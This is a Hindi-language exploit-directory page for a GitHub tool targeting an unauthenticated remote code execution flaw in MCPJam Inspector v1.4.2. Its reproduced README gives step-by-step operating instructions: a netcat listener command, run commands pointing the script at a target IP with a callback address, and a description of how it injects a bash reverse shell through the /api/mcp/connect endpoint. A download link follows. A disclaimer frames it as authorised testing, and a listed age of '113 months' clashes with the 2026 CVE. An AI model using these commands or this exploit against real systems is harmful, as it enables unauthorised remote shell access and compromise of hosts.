Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23744-RCE — यह उपयोगिता MCPJam v1.4.2 से संबंधित शोध के दौरान बनाई गई थी। एप्लिकेशन एक API एंडपॉइंट को उजागर करता है जो एक सर्वर कॉन्फ़िगरेशन ऑब्जेक्ट को स्वीकार करता है। कुछ शर्तों के तहत, अपर्याप्त सत्यापन अनपेक्षित कमांड निष्पादन की अनुमति दे सकता है। | Kitploit
उपकरण/GitHubGitHub/alisster00/cve-2026-23744-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

यह उपयोगिता MCPJam v1.4.2 से संबंधित शोध के दौरान बनाई गई थी। एप्लिकेशन एक API एंडपॉइंट को उजागर करता है जो एक सर्वर कॉन्फ़िगरेशन ऑब्जेक्ट को स्वीकार करता है। कुछ शर्तों के तहत, अपर्याप्त सत्यापन अनपेक्षित कमांड निष्पादन की अनुमति दे सकता है।

रिपॉजिटरी देखें
113 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MCPJam Inspector v1.4.2 - RCE शोषण

भेद्यता विवरण

MCPJam Inspector में /api/mcp/connect एंडपॉइंट पर एक अनप्रमाणित दूरस्थ कोड निष्पादन (RCE) भेद्यता मौजूद है। यह भेद्यता हमलावरों को एक दुर्भावनापूर्ण MCP सर्वर कॉन्फ़िगरेशन पेलोड भेजकर मनमाने कमांड निष्पादित करने की अनुमति देती है।

यह एंडपॉइंट एक serverConfig ऑब्जेक्ट के साथ JSON पेलोड स्वीकार करता है, जिसमें command और args ऐरे होते हैं, जो उचित सत्यापन या सैनिटाइज़ेशन के बिना सीधे सिस्टम पर निष्पादित होते हैं।

प्रभावित संस्करण

  • MCPJam Inspector v1.4.2 और संभवतः पुराने संस्करण

उपयोग

आवश्यक शर्तें

  • Python 3.6+
  • requests लाइब्रेरी:
pip install requests
  • श्रवणकर्ता के लिए netcat या socat
  • त्वरित शुरुआत

    टर्मिनल 1 - श्रवणकर्ता प्रारंभ करें:

    root@kitploit:~
    nc -lvnp 4444
    

    टर्मिनल 2 - शोषण चलाएं:

    root@kitploit:~
    python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
    

    उदाहरण

    root@kitploit:~
    # डिफ़ॉल्ट (पोर्ट 6274, कॉलबैक पोर्ट 4444)
    python3 script.py <TARGET_IP> -l <YOUR_IP>
    
    # कस्टम MCPJam पोर्ट
    python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
    
    # कस्टम श्रवणकर्ता पोर्ट
    python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
    

    यह कैसे काम करता है

    1. स्क्रिप्ट जांचती है कि लक्ष्य पर MCPJam सुलभ है या नहीं
    2. Bash रिवर्स शेल के साथ एक दुर्भावनापूर्ण MCP सर्वर पेलोड तैयार करता है
    3. पेलोड को /api/mcp/connect एंडपॉइंट पर भेजता है
    4. MCPJam कमांड को प्रोसेस करता है और रिवर्स शेल कॉलबैक शुरू करता है
    5. उपयोगकर्ता को श्रवणकर्ता पर इंटरैक्टिव शेल प्राप्त होता है

    अस्वीकरण

    ⚠️ अस्वीकरण:

    यह शोषण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। उपयोगकर्ता पूरी तरह से जिम्मेदार हैं:

    • किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण प्राप्त करना
    • सभी लागू कानूनों और विनियमों का अनुपालन
    • दुरुपयोग से उत्पन्न किसी भी क्षति या कानूनी परिणाम

    लेखक इस उपकरण के दुरुपयोग या क्षति के लिए कोई दायित्व नहीं मानता है। अपने जोखिम पर उपयोग करें।

    तकनीकी विवरण

    • भेद्य एंडपॉइंट: /api/mcp/connect
    • विधि: POST
    • प्रमाणीकरण: आवश्यक नहीं
    • प्रभाव: अनप्रमाणित दूरस्थ कोड निष्पादन
    टूल डाउनलोड करें